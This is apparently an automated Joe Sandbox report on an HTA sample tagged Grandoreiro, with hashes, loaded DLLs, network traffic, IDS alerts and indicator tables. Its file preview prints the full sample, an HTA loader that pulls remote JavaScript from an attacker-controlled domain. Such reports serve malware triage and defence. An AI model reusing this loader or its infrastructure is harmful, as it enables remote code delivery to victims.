Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eLoll8t7fq.hta

Overview

General Information

Sample name:eLoll8t7fq.hta
renamed because original name is a hash value
Original sample name:592a152a8b32c1754b007f8657a188fd.hta
Analysis ID:1546606
MD5:592a152a8b32c1754b007f8657a188fd
SHA1:05ba57764207bfdb5a3e4d6f6797195af7fb49bc
SHA256:57b91c4fa2c260a45897a7896e76aa219b757e528f92c3aa51fb5313c6ac77f4
Tags:Grandoreirohtauser-abuse_ch
Infos:

Detection

Score:2
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • mshta.exe (PID: 6704 cmdline: mshta.exe "C:\Users\user\Desktop\eLoll8t7fq.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-01T08:34:25.782555+010020229301A Network Trojan was detected52.149.20.212443192.168.2.749750TCP
2024-11-01T08:35:04.874262+010020229301A Network Trojan was detected52.149.20.212443192.168.2.749961TCP

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: unknownHTTPS traffic detected: 104.21.60.109:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49750
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49961
Source: global trafficHTTP traffic detected: GET //672350cabd2c8/js/672350cabd242.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: acess.mailcffemx.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET //672350cabd2c8/js/672350cabd242.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: acess.mailcffemx.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: acess.mailcffemx.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 07:34:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNcab4NQmZfz06XMFBpg5S9Buw7zcHrG74pqrTcULBLqgk%2BZeyb62d2BvrwMfDYgO27xVdM4WqbNRy7jSRk6F51YzT%2B1QRpR5PHW1GqakFIw5GhT7ap9%2BgQeN4PjkQHFFMOd4sj6Zw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba3356fe49e972-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1752&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=920&delivery_rate=1675925&cwnd=251&unsent_bytes=0&cid=2b6ca4858bbb054a&ts=506&x=0"
Source: mshta.exe, 00000000.00000003.1259509556.000000000317C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2486758713.000000000317C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acess.mailcffemx.com/
Source: mshta.exe, 00000000.00000002.2486758713.0000000003142000.00000004.00000020.00020000.00000000.sdmp, eLoll8t7fq.htaString found in binary or memory: https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.js
Source: mshta.exe, 00000000.00000003.1259509556.00000000031C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.jsH-
Source: mshta.exe, 00000000.00000003.1259509556.00000000031C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.jsZ
Source: mshta.exe, 00000000.00000003.1259509556.00000000031C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.jsn-
Source: mshta.exe, 00000000.00000002.2486758713.00000000031DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownHTTPS traffic detected: 104.21.60.109:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: clean2.winHTA@1/0@1/1
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: mshta.exe, 00000000.00000003.1259244931.00000000031E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2486758713.00000000031E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000000.00000003.1259509556.000000000317C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2486758713.000000000317C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
Source: mshta.exe, 00000000.00000003.1259509556.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2486758713.00000000031B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
eLoll8t7fq.hta3%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
acess.mailcffemx.com
104.21.60.109
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.jsfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.jsH-mshta.exe, 00000000.00000003.1259509556.00000000031C6000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        https://acess.mailcffemx.com/mshta.exe, 00000000.00000003.1259509556.000000000317C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2486758713.000000000317C000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.jsZmshta.exe, 00000000.00000003.1259509556.00000000031C6000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.jsn-mshta.exe, 00000000.00000003.1259509556.00000000031C6000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              104.21.60.109
              acess.mailcffemx.comUnited States
              13335CLOUDFLARENETUSfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1546606
              Start date and time:2024-11-01 08:33:09 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 55s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:15
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:eLoll8t7fq.hta
              renamed because original name is a hash value
              Original Sample Name:592a152a8b32c1754b007f8657a188fd.hta
              Detection:CLEAN
              Classification:clean2.winHTA@1/0@1/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .hta
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target mshta.exe, PID 6704 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              acess.mailcffemx.com#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.htaGet hashmaliciousUnknownBrowse
              • 172.67.195.227
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUSV323904LY3.lNK.lnkGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
              • 104.22.75.171
              file.exeGet hashmaliciousLummaCBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
              • 188.114.96.3
              ICBM.exeGet hashmaliciousXmrigBrowse
              • 104.26.9.242
              SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
              • 162.159.135.233
              ICBM.exeGet hashmaliciousXmrigBrowse
              • 104.26.9.242
              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
              • 188.114.97.3
              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
              • 188.114.96.3
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19V323904LY3.lNK.lnkGet hashmaliciousUnknownBrowse
              • 104.21.60.109
              PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 104.21.60.109
              PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 104.21.60.109
              oZ7nac01Em.exeGet hashmaliciousStealc, VidarBrowse
              • 104.21.60.109
              SecuriteInfo.com.FileRepMalware.6479.21607.exeGet hashmaliciousUnknownBrowse
              • 104.21.60.109
              WGo3ga1AL9.exeGet hashmaliciousStealc, VidarBrowse
              • 104.21.60.109
              FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 104.21.60.109
              FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 104.21.60.109
              PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 104.21.60.109
              Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 104.21.60.109
              No context
              No created / dropped files found
              File type:HTML document, ASCII text, with CRLF line terminators
              Entropy (8bit):4.871888750837731
              TrID:
              • HyperText Markup Language (12001/1) 66.65%
              • HyperText Markup Language (6006/1) 33.35%
              File name:eLoll8t7fq.hta
              File size:138 bytes
              MD5:592a152a8b32c1754b007f8657a188fd
              SHA1:05ba57764207bfdb5a3e4d6f6797195af7fb49bc
              SHA256:57b91c4fa2c260a45897a7896e76aa219b757e528f92c3aa51fb5313c6ac77f4
              SHA512:0889c92e3b774c5f02e800351b2a242c8fed29cf666271448595b9c8105de2912a845615a3f1552be9991944e14be574b9161e84e79dda27640f071167d59c25
              SSDEEP:3:qVoB3tObvvUJMyRf3dUJ4u7ZNGXIMBWhtoAcMBcacWWGb:q43tEvvUJLqdNVMch0MWXfGb
              TLSH:E2C02B771F000C3E51B06A7A18C0E0F43007B1815990CC41C090C06326103764C93181
              File Content Preview:<html>..<head>..<script src="https://acess.mailcffemx.com//672350cabd2c8/js/672350cabd242.js"></script>..</head>..<body>..</body>..</html>
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-11-01T08:34:25.782555+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.749750TCP
              2024-11-01T08:35:04.874262+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.749961TCP
              TimestampSource PortDest PortSource IPDest IP
              Nov 1, 2024 08:34:06.437710047 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:06.437789917 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:06.437875032 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:06.449726105 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:06.449754953 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:07.064606905 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:07.064702988 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:07.120132923 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:07.120198965 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:07.120490074 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:07.120609045 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:07.124116898 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:07.167380095 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:07.557106018 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:07.557195902 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:07.557470083 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:07.559201956 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:07.559252977 CET44349703104.21.60.109192.168.2.7
              Nov 1, 2024 08:34:07.559283018 CET49703443192.168.2.7104.21.60.109
              Nov 1, 2024 08:34:07.559329033 CET49703443192.168.2.7104.21.60.109
              TimestampSource PortDest PortSource IPDest IP
              Nov 1, 2024 08:34:06.417206049 CET6436153192.168.2.71.1.1.1
              Nov 1, 2024 08:34:06.432842970 CET53643611.1.1.1192.168.2.7
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 1, 2024 08:34:06.417206049 CET192.168.2.71.1.1.10x1553Standard query (0)acess.mailcffemx.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 1, 2024 08:34:06.432842970 CET1.1.1.1192.168.2.70x1553No error (0)acess.mailcffemx.com104.21.60.109A (IP address)IN (0x0001)false
              Nov 1, 2024 08:34:06.432842970 CET1.1.1.1192.168.2.70x1553No error (0)acess.mailcffemx.com172.67.195.227A (IP address)IN (0x0001)false
              • acess.mailcffemx.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.749703104.21.60.1094436704C:\Windows\SysWOW64\mshta.exe
              TimestampBytes transferredDirectionData
              2024-11-01 07:34:07 UTC338OUTGET //672350cabd2c8/js/672350cabd242.js HTTP/1.1
              Accept: */*
              Accept-Language: en-CH
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: acess.mailcffemx.com
              Connection: Keep-Alive
              2024-11-01 07:34:07 UTC814INHTTP/1.1 404 Not Found
              Date: Fri, 01 Nov 2024 07:34:07 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              Cache-Control: max-age=14400
              CF-Cache-Status: EXPIRED
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNcab4NQmZfz06XMFBpg5S9Buw7zcHrG74pqrTcULBLqgk%2BZeyb62d2BvrwMfDYgO27xVdM4WqbNRy7jSRk6F51YzT%2B1QRpR5PHW1GqakFIw5GhT7ap9%2BgQeN4PjkQHFFMOd4sj6Zw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8dba3356fe49e972-DFW
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1752&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=920&delivery_rate=1675925&cwnd=251&unsent_bytes=0&cid=2b6ca4858bbb054a&ts=506&x=0"
              2024-11-01 07:34:07 UTC289INData Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 63 65 73 73 2e 6d 61 69 6c 63 66 66 65 6d 78 2e 63 6f 6d 20 50
              Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at acess.mailcffemx.com P
              2024-11-01 07:34:07 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Click to jump to process

              Click to jump to process

              Target ID:0
              Start time:03:34:04
              Start date:01/11/2024
              Path:C:\Windows\SysWOW64\mshta.exe
              Wow64 process (32bit):true
              Commandline:mshta.exe "C:\Users\user\Desktop\eLoll8t7fq.hta"
              Imagebase:0x180000
              File size:13'312 bytes
              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:false

              No disassembly